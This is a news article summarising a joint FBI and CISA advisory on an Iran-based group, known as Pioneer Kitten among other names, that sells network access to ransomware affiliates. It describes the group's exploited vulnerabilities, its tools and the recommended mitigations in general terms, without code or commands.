After they’re done spying for the government, the Iranian cyber army will trade access to victim organizations for money. The Federal Bureau of Investigation (FBI) warns that the state-sponsored group has a wide arsenal of tools to breach education, finance, healthcare, and defense organizations.
The group of Iran-based cyber actors comes under many names: Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, or Lemon Sandstorm. They call themselves Br0k3r or “xplfinder” in their channels.
Serving the Government of Iran to conduct computer network exploitation, espionage, and theft of sensitive data from Israel or Azerbaijan is not enough for them.
They also sell or broker unauthorized access to companies’ systems in the US and elsewhere around the globe.
According to a new joint advisory by US cyber authorities, the FBI has identified Iranian actors collaborating directly with ransomware affiliates to enable encryption operations in exchange for a percentage of the ransom payments.
“These actors have collaborated with the ransomware affiliates NoEscape, Ransomhouse, and ALPHV (aka BlackCat),” the advisory claims.
The Iranian cyber actors’ involvement goes beyond providing access. They also work closely with ransomware affiliates to help lock computer networks and strategize how to better extort their victims.
“These actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin,” the FBI assesses.
The updated tactics branch from Pay2Key, a successful information operation against Israeli companies in 2020. This hack-and-leak campaign aimed not to obtain ransom payments but to undermine the security of Israel-based cyberinfrastructure.
Iranian actors operated a leak site on the dark web, which was hosted on a compromised organization’s infrastructure. The hackers announced their achievements on social media, tagging accounts of the victims and media organizations and leaking stolen victim data.
The FBI warns that Iran’s attackers exploit US and foreign organizations as of August 2024. Those include US-based schools, municipal governments, financial institutions, and healthcare facilities.
“This group directs their activity towards countries and organizations consistent with Iranian state interests, and typically not of interest to the group’s ransomware affiliate contacts, such as US defense sector networks, and those in Israel, Azerbaijan, United Arab Emirates,” the FBI said.
“The group’s ransomware activities are likely not sanctioned by the GOI, as the actors have expressed concern for government monitoring of cryptocurrency movement associated with their malicious activity.”
A wide arsenal of cyber tools
Iran’s threat actors often start their intrusions by exploiting remote external services on internet-facing systems, as the US agencies describe in an overview of the observed tactics.
Lately, they’ve been scanning IP addresses hosting Check Point Security Gateways, probing for a specific vulnerability (CVE-2024-24919). Previously, they were mass-scanning IP addresses hosting other devices and vulnerabilities, such as Palo Alto Networks PAN-OS and GlobalProtect VPN.
The group also uses open-source tools, such as the Shodan search engine, to identify and enumerate IPs for vulnerabilities to particular vulnerabilities.
Once attackers are in, they usually want to capture login credentials using web shells, create accounts on the victim networks, request exemptions to the security policies to maintain persistence, deploy backdoors, and deploy various malicious payloads.
They were observed using a compromised administrator account to initiate a remote desktop session to another server on the network.
For command and control, Iranian threat actors used the AnyDesk remote access program, the PowerShell Web Access feature, the open-source tunneling tool Ligolo, and the NGROK tool for outbound connections.
The FBI and CISA discovered dozens of IP addresses and bitcoin wallets used by the threat actors. The authorities recommend all organizations implement the mitigations listed in the advisory.
These include reviewing suspicious IP addresses for any activity, applying patches to specific vulnerabilities, checking systems for unique identifiers used by Tehran’s cyber warriors, including specific usernames, NGROK and Ligolo packages, webshells in particular directories, monitoring requests to suspicious domains, and others.
Authorities “do not encourage paying ransom,” as that doesn’t guarantee the recovery of encrypted files and only emboldens adversaries to expand their illicit activities.
Your email address will not be published. Required fields are markedmarked